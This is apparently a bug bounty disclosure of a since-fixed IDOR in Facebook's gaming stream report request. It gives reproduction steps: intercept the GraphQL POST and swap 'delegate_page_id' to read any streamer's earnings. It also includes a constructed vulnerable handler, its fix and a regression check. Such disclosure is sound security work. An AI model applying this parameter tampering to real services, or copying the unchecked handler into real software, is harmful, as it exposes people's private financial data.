Introduction
Within the Facebook gaming dashboard, streamers have access to a valuable feature known as the “Viewing Stream Report.” This option provides essential information about their stream, including details such as the title, description, and tagged game. Streamers can leverage this tool to gain insights into the performance and key attributes of their streams. For additional details, refer to the official guide at https://www.facebook.com/business/help/423354648152123?id=648321075955172.
The finding
The POST request that serves this option is vulnerable to an Insecure Direct Object Reference (IDOR) in the “delegate_page_id” parameter: the server returns the report for whatever page ID the client supplies without checking that the requesting user administers that page. This allows unauthorized access to the financial information of the most recent live stream on any gaming streamer’s page.
The flaw lets an attacker reveal the earnings associated with the latest stream video asset of any gaming streamer page. The severity of this vulnerability lies in the unauthorized disclosure of sensitive financial data, which poses a significant risk to the affected streamers’ privacy and financial security.
Reproduction Steps
Attacker’s Perspective:
- Navigate to https://business.facebook.com/creatorstudio/home > Creative tools > Live dashboard.
- Open the “Latest stream” box, start intercepting requests with Burp Suite, and click “View Stream Report.”
The intercepted POST request looks as follows:
POST /api/graphql/ HTTP/1.1
Host: business.facebook.com
av=attacker_page_id&__user=attacker_user_id&__a=1&__dyn=xxx&__csr=&__req=1l&__beoa=0&__pc=PHASED%3Amedia_manager_pkg&dpr=1&__ccg=EXCELLENT&__rev=1003338073&__s=1go6yt%3A1dmt22%3Amrohob&__hsi=6931897176295571644-0&__comet_req=0&fb_dtsg=xxxxxx&jazoest=22015&__jssesw=1&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=GamesVideoStreamerDashboardProfilePlusVideoQuery&variables={"delegate_page_id":"attacker_page_ID"}&server_timestamps=true&doc_id=5005787666128910
The vulnerable parameter is “delegate_page_id.” Change its value to the page ID of any other streamer page and forward the request to the server.
The response contains extensive information about that streamer page, including sensitive details such as:
"latest_stream_video_asset_earnings":"500.00"
This information, specifically the earnings, is private and should only be accessible to the page’s administrators. Unauthorized access to such financial details is a serious breach of privacy and requires immediate remediation.
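The root cause described above is a missing server-side authorization check: the handler trusts the client-supplied “delegate_page_id” and never verifies that the authenticated caller administers that page. The following Python is an added illustration of that defect beside its fix, not Facebook/Meta code; the page records, user IDs, earnings values, handler names and the in-memory store are all constructed for the example, and the small regression helper at the end is a hypothetical check a team could run in CI to catch this class of bug before it ships.

```python
"""
Constructed illustration of an IDOR in a "view stream report" handler and
its hardened form. Nothing here is Facebook/Meta code; all data is sample data.
"""
from __future__ import annotations
from dataclasses import dataclass
from typing import Callable


@dataclass
class Page:
    page_id: str
    admins: set[str]                           # user IDs allowed to see reports
    latest_stream_video_asset_earnings: str    # stored as the API renders it


class Forbidden(Exception):
    """Raised when the caller may not view the requested page's report."""


# Constructed sample data: two streamer pages, each administered by one user.
PAGES: dict[str, Page] = {
    "1001": Page("1001", {"user_a"}, "500.00"),
    "2002": Page("2002", {"user_b"}, "1250.00"),
}


def _serialize(page: Page) -> dict:
    """Field projection shared by both handlers (hypothetical response shape)."""
    return {"latest_stream_video_asset_earnings": page.latest_stream_video_asset_earnings}


def stream_report_vulnerable(caller_user_id: str, delegate_page_id: str) -> dict:
    """Vulnerable shape: the page is resolved purely from the client-supplied
    id and serialized without any ownership check, so any authenticated user
    can read any page's earnings just by changing delegate_page_id."""
    page = PAGES[delegate_page_id]
    return _serialize(page)


def stream_report_fixed(caller_user_id: str, delegate_page_id: str) -> dict:
    """Hardened shape: the authorization decision is made on the authenticated
    identity (caller_user_id, taken from the session, never from a request
    parameter) before any field of the object is serialized."""
    page = PAGES.get(delegate_page_id)
    if page is None or caller_user_id not in page.admins:
        # One failure path for both "no such page" and "not an admin" so the
        # endpoint cannot be used to enumerate which page ids exist.
        raise Forbidden("caller does not administer the requested page")
    return _serialize(page)


def is_idor_safe(handler: Callable[[str, str], dict]) -> bool:
    """Regression check: every admin of page X must be refused the report of
    every other page Y. Returns True only if all cross-page calls are blocked."""
    for target in PAGES.values():
        for other in PAGES.values():
            if other is target:
                continue
            for outsider in other.admins:
                try:
                    handler(outsider, target.page_id)
                except Forbidden:
                    continue
                return False   # cross-page read succeeded: the handler is vulnerable
    return True


if __name__ == "__main__":
    print("vulnerable handler safe:", is_idor_safe(stream_report_vulnerable))  # False
    print("fixed handler safe:     ", is_idor_safe(stream_report_fixed))       # True
```

The point of the check being on `caller_user_id` is worth stating explicitly: in the captured request above both `av` and `delegate_page_id` are client-controlled, so a fix that compares those two parameters to each other would still be bypassable. The authorization decision has to be made against the identity the server established at login and the page-to-admin relationship the server stores, which is what the hardened handler does.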
Timeline
Sarmad | 22 Feb 2021
- Initial Report
Meta Bug Bounty | 24 Feb 2021
- Report Triaged
Meta Bug Bounty | 16 Mar 2021
- Report Fixed
Sarmad | 16 Mar 2021
- Fix Confirmed
Meta Bug Bounty | 19 Mar 2021
- Bounty Awarded + Bonus